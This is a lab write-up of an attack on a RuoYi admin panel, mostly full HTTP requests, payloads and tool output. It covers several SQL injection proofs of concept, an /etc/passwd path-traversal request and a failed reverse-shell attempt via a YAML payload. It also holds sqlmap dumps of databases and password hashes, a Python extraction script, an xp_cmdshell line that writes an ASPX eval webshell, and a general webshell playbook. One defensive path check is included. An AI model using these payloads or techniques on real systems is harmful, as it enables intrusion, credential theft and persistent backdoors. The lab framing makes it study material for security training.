Lab address: http://wba2x0kpf.lab.aqlab.cn/login
Open the lab:
Log in with a weak password.
Tried the RuoYi frontend default Shiro key command-execution vulnerability: no result.
Backend SQL injection: both the "User Management" and "Role Management" functions have SQL injection.
1. First injection point
User Management POC:
POST /system/user/list HTTP/1.1
Host: wba2x0kpf.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 330
Origin: http://wba2x0kpf.lab.aqlab.cn
Authorization: Basic emthcTp6a2Fx
Connection: close
Referer: http://wba2x0kpf.lab.aqlab.cn/system/user
Cookie: JSESSIONID=1c937ad8-81bf-4af8-8271-9dcf0adccf05; rememberMe=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
pageSize=10&pageNum=1&orderByColumn=createTime&isAsc=desc&deptId=&parentId=&loginName=&phonenumber=&status=&params%5BbeginTime%5D=&params%5BendTime%5D=pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
2. Second injection point:
Role Management POC:
POST /system/role/list HTTP/1.1
Host: wba2x0kpf.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 330
Origin: http://wba2x0kpf.lab.aqlab.cn
Authorization: Basic emthcTp6a2Fx
Connection: close
Referer: http://wba2x0kpf.lab.aqlab.cn/system/role
Cookie: JSESSIONID=1c937ad8-81bf-4af8-8271-9dcf0adccf05; rememberMe=[truncated]
pageSize=10&pageNum=1&orderByColumn=createTime&isAsc=desc&deptId=&parentId=&loginName=&phonenumber=&status=&params%5BbeginTime%5D=&params%5BendTime%5D=pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
3. Third injection point
Department edit interface (the injection is in the ancestors parameter):
POST /system/dept/edit HTTP/1.1
Host: wba2x0kpf.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 111
Origin: http://wba2x0kpf.lab.aqlab.cn
Authorization: Basic emthcTp6a2Fx
Connection: close
Referer: http://wba2x0kpf.lab.aqlab.cn/system/post
Cookie: JSESSIONID=12402b41-742c-4f59-bb79-ec4d34dbc971; rememberMe=[truncated]
DeptName=1&DeptId=100&ParentId=12&Status=0&OrderNum=1&ancestors=0)or(extractvalue(1,concat((select user()))));#
4. Fourth injection point
Role export interface:
POST /system/role/export HTTP/1.1
Host: wba2x0kpf.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 75
Origin: http://wba2x0kpf.lab.aqlab.cn
Authorization: Basic emthcTp6a2Fx
Connection: close
Referer: http://wba2x0kpf.lab.aqlab.cn/system/post
Cookie: JSESSIONID=12402b41-742c-4f59-bb79-ec4d34dbc971; rememberMe=[truncated]
params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
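The four POCs above all lean on the same trick: extractvalue() raises an XPATH syntax error that echoes its argument, so whatever is wrapped in concat(0x7e, ..., 0x7e) comes back in the JSON error message. What the POCs do not show is the limit a practitioner hits immediately after database(): MySQL and MariaDB truncate that echoed text at 32 characters, so anything longer (a group_concat of schema names, a password hash) has to be read through substr() windows. The following Python is an added example, not code from this write-up or from RuoYi. It builds the windowed params[dataScope] value, parses the leaked fragment out of a response body, and reassembles a long result; fake_server and FAKE_DB are a constructed stand-in for the lab target so the script runs offline, and in a real run send would be a function that POSTs the payload to /system/role/list and returns the body.

```python
import re
from typing import Callable, Optional

# Added example, not part of the original write-up. It models the
# error-based technique used against the params[dataScope] parameter.
ERR_LIMIT = 32                      # MySQL/MariaDB truncate the XPATH error text here
CHUNK = ERR_LIMIT - 2               # two bytes are spent on the 0x7e ('~') delimiters
LEAK_RE = re.compile(r"XPATH syntax error: '~([^']*?)~?'")


def build_payload(expr: str, offset: int = 1, length: int = CHUNK) -> str:
    """Value for params[dataScope]: mirrors the page's POC but windows the
    result with substr() so strings longer than 30 characters can be read."""
    return (f"and extractvalue(1,concat(0x7e,"
            f"substr(({expr}),{offset},{length}),0x7e))")


def parse_leak(body: str) -> Optional[str]:
    """Pull the leaked fragment out of the MySQL error echoed in the response.
    The closing '~' is optional because a 32-character echo may cut it off."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def dump(expr: str, send: Callable[[str], str]) -> str:
    """Read a whole scalar by walking substr() windows until a short chunk."""
    out, offset = "", 1
    while True:
        chunk = parse_leak(send(build_payload(expr, offset)))
        if chunk is None:
            raise RuntimeError("no XPATH error in response; injection point may be filtered")
        out += chunk
        if len(chunk) < CHUNK:
            return out
        offset += CHUNK


# --- constructed stand-in for the lab target, so the example runs offline ---
# Hypothetical "database" content; the schema names are the ones sqlmap lists later.
FAKE_DB = {
    "select database()": "ry",
    "select group_concat(schema_name) from information_schema.schemata":
        "information_schema,mysql,performance_schema,ry,test",
}
_PAYLOAD_RE = re.compile(r"substr\(\((.+?)\),(\d+),(\d+)\)")


def fake_server(payload: str) -> str:
    """Emulates the vulnerable endpoint: MySQL evaluates
    concat('~', substr(value, off, len), '~'), extractvalue() fails, and the
    first 32 characters of that concat() land in the JSON error message."""
    m = _PAYLOAD_RE.search(payload)
    if not m:
        return '{"code":500,"msg":"You have an error in your SQL syntax"}'
    expr, off, ln = m.group(1), int(m.group(2)), int(m.group(3))
    value = FAKE_DB.get(expr, "")
    echoed = ("~" + value[off - 1: off - 1 + ln] + "~")[:ERR_LIMIT]
    return '{"code":500,"msg":"XPATH syntax error: \'' + echoed + '\'"}'


if __name__ == "__main__":
    print(dump("select database()", fake_server))
    print(dump("select group_concat(schema_name) from information_schema.schemata", fake_server))
```

The window is 30 rather than 32 because the two tildes count against the limit; dropping the delimiters would gain two characters per request but makes the regex fragile against the surrounding quote marks in the JSON.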
RuoYi 4.7.5 backend SQL injection
In ruoyi-4.7.5, the /tool/gen/createTable route in the backend controller com/ruoyi/generator/controller/GenController has SQL injection.
POC:
sql=CREATE table ss1 as SELECT/**/* FROM sys_job WHERE 1=1 union/**/SELECT/**/extractvalue(1,concat(0x7e,(select/**/version()),0x7e));
But on the lab target I tried this did not succeed; perhaps it does not have ...
RuoYi backend arbitrary file read (CNVD-2021-01931)
Affected versions: RuoYi < 4.5.1
POC:
GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1
Host: wba2x0kpf.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic emthcTp6a2Fx
Connection: close
Cookie: JSESSIONID=12402b41-742c-4f59-bb79-ec4d34dbc971; rememberMe=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
Upgrade-Insecure-Requests: 1
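The request above works because the resource parameter is appended to the upload directory without checking where the resulting path ends up. As an added example (not RuoYi's own fix and not code from this write-up), here is the containment check a reviewer would want on /common/download/resource: decode, normalise, then require the result to stay inside the upload root. PROFILE_ROOT is an assumed path; RuoYi maps the /profile URL prefix to a configurable upload directory, so the real value is deployment-specific.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Added example, not RuoYi's code. Hypothetical upload root; the real
# directory behind the /profile prefix is set in the deployment config.
PROFILE_ROOT = "/home/ruoyi/uploadPath"
URL_PREFIX = "/profile"


def resolve_resource(resource: str, root: str = PROFILE_ROOT) -> Optional[str]:
    """Map a ?resource= value onto a filesystem path, or return None if it
    would escape the upload root. Decodes twice to catch %252e%252e, then
    normalises before comparing so '..' and '/./' segments cannot slip by."""
    decoded = unquote(unquote(resource))
    if not decoded.startswith(URL_PREFIX + "/"):
        return None                       # only files under /profile are downloadable
    relative = decoded[len(URL_PREFIX):]
    if "\x00" in relative or "\\" in relative:
        return None                       # NUL and backslash tricks are rejected outright
    target = posixpath.normpath(root + relative)
    # normpath has collapsed every '..'; the result must be strictly inside root
    if not target.startswith(root.rstrip("/") + "/"):
        return None
    return target


if __name__ == "__main__":
    for probe in ("/profile/upload/2024/05/11/a.png",
                  "/profile/../../../../etc/passwd",
                  "/profile/%252e%252e/%252e%252e/etc/passwd"):
        print(probe, "->", resolve_resource(probe))
```

Comparing the normalised string against the root is deliberately done with posixpath rather than the real filesystem, so the check behaves the same in a unit test and on the server; a deployment that allows symlinks inside the upload directory would additionally need os.path.realpath on the final target.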
RuoYi backend scheduled task RCE
root@oexie9c7ndyat1k:~# cd yaml-payload-master/
root@oexie9c7ndyat1k:~/yaml-payload-master# ls
README.md src yaml-payload.yml
root@oexie9c7ndyat1k:~/yaml-payload-master# javac src/artsploit/AwesomeScriptEngineFactory.java
root@oexie9c7ndyat1k:~/yaml-payload-master# jar -cvf yaml-payload.jar -C src/ .
added manifest
ignoring entry META-INF/
adding: META-INF/services/(in = 0) (out= 0)(stored 0%)
adding: META-INF/services/javax.script.ScriptEngineFactory(in = 36) (out= 38)(deflated -5%)
adding: artsploit/(in = 0) (out= 0)(stored 0%)
adding: artsploit/AwesomeScriptEngineFactory.class(in = 1763) (out= 789)(deflated 55%)
adding: artsploit/AwesomeScriptEngineFactory.java(in = 1654) (out= 499)(deflated 69%)
root@oexie9c7ndyat1k:~/yaml-payload-master# python3 -m http.server 5555
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
The VPS received the request, but no reverse shell came back.
(I spent a long time trying here and am not sure what is going on; I could not get a reverse shell.)
This is a lab. In a real engagement, demonstrating up to this point would be enough to submit the vulnerability, but in the lab we need the flag, so we use the injection point to read information from the database.
PS E:\sqlmap\sqlmapproject-sqlmap-bb48dd0> python .\sqlmap.py -r .\3.txt --technique E --dbs --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.1.6#dev}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:16:09 /2024-05-11/
[17:16:09] [INFO] parsing HTTP request from '.\3.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[17:16:10] [INFO] resuming back-end DBMS 'mysql'
[17:16:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: pageSize=10&pageNum=1&orderByColumn=createTime&isAsc=desc&deptId=&parentId=&loginName=&phonenumber=&status=&params[beginTime]=&params[endTime]=pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]= AND (SELECT 7901 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(7901=7901,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[17:16:10] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[17:16:10] [INFO] fetching database names
[17:16:10] [WARNING] reflective value(s) found and filtering out
[17:16:10] [INFO] retrieved: 'information_schema'
[17:16:10] [INFO] retrieved: 'mysql'
[17:16:11] [INFO] retrieved: 'performance_schema'
[17:16:11] [INFO] retrieved: 'ry'
[17:16:11] [INFO] retrieved: 'test'
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] ry
[*] test
[17:16:11] [INFO] fetched data logged to text files under 'C:\Users\jack\AppData\Local\sqlmap\output\wba2x0kpf.lab.aqlab.cn'
[*] ending @ 17:16:11 /2024-05-11/
Read the information in the "ry" database
PS E:\sqlmap\sqlmapproject-sqlmap-bb48dd0> python .\sqlmap.py -r .\3.txt --technique E -D "ry" --batch --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.1.6#dev}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:20:07 /2024-05-11/
[17:20:07] [INFO] parsing HTTP request from '.\3.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[17:20:07] [INFO] resuming back-end DBMS 'mysql'
[17:20:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: pageSize=10&pageNum=1&orderByColumn=createTime&isAsc=desc&deptId=&parentId=&loginName=&phonenumber=&status=&params[beginTime]=&params[endTime]=pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]= AND (SELECT 7901 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(7901=7901,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[17:20:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[17:20:08] [INFO] fetching tables for database: 'ry'
[17:20:08] [WARNING] reflective value(s) found and filtering out
[17:20:08] [INFO] retrieved: 'QRTZ_BLOB_TRIGGERS'
[17:20:08] [INFO] retrieved: 'QRTZ_CALENDARS'
[17:20:08] [INFO] retrieved: 'QRTZ_CRON_TRIGGERS'
[17:20:08] [INFO] retrieved: 'QRTZ_FIRED_TRIGGERS'
[17:20:08] [INFO] retrieved: 'QRTZ_JOB_DETAILS'
[17:20:09] [INFO] retrieved: 'QRTZ_LOCKS'
[17:20:09] [INFO] retrieved: 'QRTZ_PAUSED_TRIGGER_GRPS'
[17:20:09] [INFO] retrieved: 'QRTZ_SCHEDULER_STATE'
[17:20:09] [INFO] retrieved: 'QRTZ_SIMPLE_TRIGGERS'
[17:20:09] [INFO] retrieved: 'QRTZ_SIMPROP_TRIGGERS'
[17:20:09] [INFO] retrieved: 'QRTZ_TRIGGERS'
[17:20:09] [INFO] retrieved: 'gen_table'
[17:20:10] [INFO] retrieved: 'gen_table_column'
[17:20:10] [INFO] retrieved: 'sys_config'
[17:20:10] [INFO] retrieved: 'sys_dept'
[17:20:10] [INFO] retrieved: 'sys_dict_data'
[17:20:10] [INFO] retrieved: 'sys_dict_type'
[17:20:10] [INFO] retrieved: 'sys_job'
[17:20:10] [INFO] retrieved: 'sys_job_log'
[17:20:10] [INFO] retrieved: 'sys_logininfor'
[17:20:10] [INFO] retrieved: 'sys_menu'
[17:20:10] [INFO] retrieved: 'sys_notice'
[17:20:10] [INFO] retrieved: 'sys_oper_log'
[17:20:11] [INFO] retrieved: 'sys_post'
[17:20:11] [INFO] retrieved: 'sys_role'
[17:20:11] [INFO] retrieved: 'sys_role_dept'
[17:20:11] [INFO] retrieved: 'sys_role_menu'
[17:20:11] [INFO] retrieved: 'sys_user'
[17:20:11] [INFO] retrieved: 'sys_user_online'
[17:20:11] [INFO] retrieved: 'sys_user_post'
[17:20:11] [INFO] retrieved: 'sys_user_role'
Database: ry
[31 tables]
+--------------------------+
| QRTZ_BLOB_TRIGGERS |
| QRTZ_CALENDARS |
| QRTZ_CRON_TRIGGERS |
| QRTZ_FIRED_TRIGGERS |
| QRTZ_JOB_DETAILS |
| QRTZ_LOCKS |
| QRTZ_PAUSED_TRIGGER_GRPS |
| QRTZ_SCHEDULER_STATE |
| QRTZ_SIMPLE_TRIGGERS |
| QRTZ_SIMPROP_TRIGGERS |
| QRTZ_TRIGGERS |
| gen_table |
| gen_table_column |
| sys_config |
| sys_dept |
| sys_dict_data |
| sys_dict_type |
| sys_job |
| sys_job_log |
| sys_logininfor |
| sys_menu |
| sys_notice |
| sys_oper_log |
| sys_post |
| sys_role |
| sys_role_dept |
| sys_role_menu |
| sys_user |
| sys_user_online |
| sys_user_post |
| sys_user_role |
+--------------------------+
[17:20:11] [INFO] fetched data logged to text files under 'C:\Users\jack\AppData\Local\sqlmap\output\wba2x0kpf.lab.aqlab.cn'
[*] ending @ 17:20:11 /2024-05-11/
After reading for a long time I found that the flag is in the /tmp directory.
But I will use this lab exercise to record a few sqlmap tips.
1. For example, sqlmap -u "xxxxx" --file-write="/root/Desktop/1.txt" --file-dest="f:\1.txt" writes a file through sqlmap. This needs a high-privilege (DBA) database account that holds the FILE privilege, and secure_file_priv must not block the destination directory.
2. Suppose sqlmap -u www.xxxx/aboutus.php?id=1 --current-db cannot complete the injection; we can add a few things, for example:
sqlmap -u www.xxxx/aboutus.php?id=1 --current-db --hex: --hex makes sqlmap retrieve data hex-encoded on the DBMS side, which sometimes gets past filtering or character-set problems.
sqlmap -u www.xxxx/aboutus.php?id=1 --current-db --no-cast: --no-cast turns off sqlmap's habit of casting retrieved values to strings (the CAST/IFNULL wrappers in its queries), which also sometimes gets around a filter or a broken result.
sqlmap -u www.xxxx/aboutus.php?id=1 --current-db --hpp: --hpp uses HTTP parameter pollution, which also sometimes bypasses protection.
sqlmap -u www.xxxx/aboutus.php?id=1 --current-db --tamper apostrophemask.py: uses a tamper script to bypass; this one replaces the apostrophe with its UTF-8 full-width counterpart (%EF%BC%87).
--sql-shell opens an interactive SQL shell; there, select host,user,password from mysql.user quickly lists the database users and password hashes (on MySQL 5.7 and later the column is authentication_string; this target is a MariaDB fork, so password works).
PS E:\sqlmap\sqlmapproject-sqlmap-bb48dd0> python .\sqlmap.py -r .\3.txt --technique E --sql-shel --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.1.6#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:48:23 /2024-05-11/
[17:48:23] [INFO] parsing HTTP request from '.\3.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[17:48:23] [INFO] resuming back-end DBMS 'mysql'
[17:48:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: pageSize=10&pageNum=1&orderByColumn=createTime&isAsc=desc&deptId=&parentId=&loginName=&phonenumber=&status=&params[beginTime]=&params[endTime]=pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]= AND (SELECT 3348 FROM(SELECT COUNT(*),CONCAT(0x7176787a71,(SELECT (ELT(3348=3348,1))),0x716b626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[17:48:23] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[17:48:23] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select host,user,password from mysql.user
[17:48:35] [INFO] fetching SQL SELECT statement query output: 'select host,user,password from mysql.user'
[17:48:35] [WARNING] reflective value(s) found and filtering out
[17:48:36] [INFO] retrieved: '127.0.0.1'
[17:48:36] [INFO] retrieved: 'root'
[17:48:36] [INFO] retrieved: '*81F5E21E3540D884ACD4A731AEBFB6AF209E1B'
[17:48:36] [INFO] retrieved: '927c878f177'
[17:48:36] [INFO] retrieved: ''
[17:48:36] [INFO] retrieved: ''
[17:48:36] [INFO] retrieved: '927c872f177'
[17:48:36] [INFO] retrieved: 'root'
[17:48:36] [INFO] retrieved: ''
[17:48:36] [INFO] retrieved: '::1'
[17:48:37] [INFO] retrieved: 'root'
[17:48:37] [INFO] retrieved: ''
[17:48:37] [INFO] retrieved: 'localhost'
[17:48:37] [INFO] retrieved: ''
[17:48:37] [INFO] retrieved: ''
[17:48:37] [INFO] retrieved: 'localhost'
[17:48:37] [INFO] retrieved: 'root'
[17:48:37] [INFO] retrieved: ''
select host,user,password from mysql.user [6]:
[*] 127.0.0.1, root, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*] 927c88f177, ,
[*] 927c72f177, root,
[*] ::1, root,
[*] localhost, ,
[*] localhost, root,
sql-shell>
Since I am not yet familiar with the RuoYi site directory layout, --os-shell did not succeed; I will come back and fill in this point once I know it better.
Several ways to obtain a shell
2. Obtain a shell via a direct database connection
sqlmap -d mssql://sa:sa@192.168.91.131:1433/master --os-shell
4.5.2 Conditions for obtaining a webshell or shell
1. Obtaining a webshell on a PHP + MySQL site
(1) MySQL root privileges, i.e. the account configured for the MySQL connection is root (a non-root account with root-equivalent privileges also works)
(2) GPC (magic_quotes_gpc) is off, so single quotes can be used
(3) The absolute path of the website is known, and the database account can write files into that directory
(4) secure-file-priv is not configured (or does not restrict the target directory)
2. Conditions for obtaining a webshell on an MSSQL + ASP/ASP.NET site
(1) The database user is sa
(2) xp_cmdshell can be created or enabled
(3) The real path is known
(4) A shell can be written out through the echo command
';exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval (Request.Item["bmfx"], "unsafe");%^> >> C:\tools\fx.aspx';--
4.5.3 Approaches and commands for obtaining a webshell
1. Approach for obtaining a webshell on a PHP site
(1) Get an os-shell
sqlmap.py -u "http://www.xxx.com/index.php?id=2" --os-shell
(2) Choose 4 (PHP) as the web application language
(3) Choose the physical path
Common location(s), custom location(s), a custom directory list file for brute force, or brute force search
(4) Get the webshell
sqlmap cannot hand you a webshell directly. If the whole --os-shell procedure completes, it uploads two files and tells you their names: one is a backdoor file that executes commands passed to it as a parameter, the other is a file-upload page through which you can upload files directly.
(5) The hard part of getting a PHP webshell
Throughout the process, obtaining the real physical path of the site is the most important step. It can usually be found via the phpinfo function, test pages, error messages, search engines, or directory brute-forcing. If you have obtained the administrator's credentials and can log in to the backend, probe pages or system-status pages in the backend may also reveal the real physical path. If it really cannot be found, only brute-force guessing, social engineering or other means remain.
2. Write the webshell directly to the site
sqlmap.py -u "http://www.xxx.com/index.php?id=3" --file-write /opt/bmfx.php --file-dest /var/www/html/shell.php
bmfx.php is the attacker's local file; shell.php is the filename written on the target site
3. Download and execute a file from the os-shell
4. Connect to MySQL through sqlmap and get a shell
5. Log in to the admin backend with the credentials and look for upload points
(1) Upload the webshell directly from the backend
(2) Capture the request and craft it to bypass protection and upload the webshell
(3) IIS 6 malformed-filename parsing flaw: upload a one-liner image named 1.asp;.jpg
(4) IIS 7 CGI parsing flaw: upload a webshell inside an image file and visit http://www.xxx.com/1.jpg/1.php
(5) FCKeditor double upload to get a webshell
(6) Other upload vulnerabilities that yield a webshell
4.5.4 Approaches for obtaining system privileges
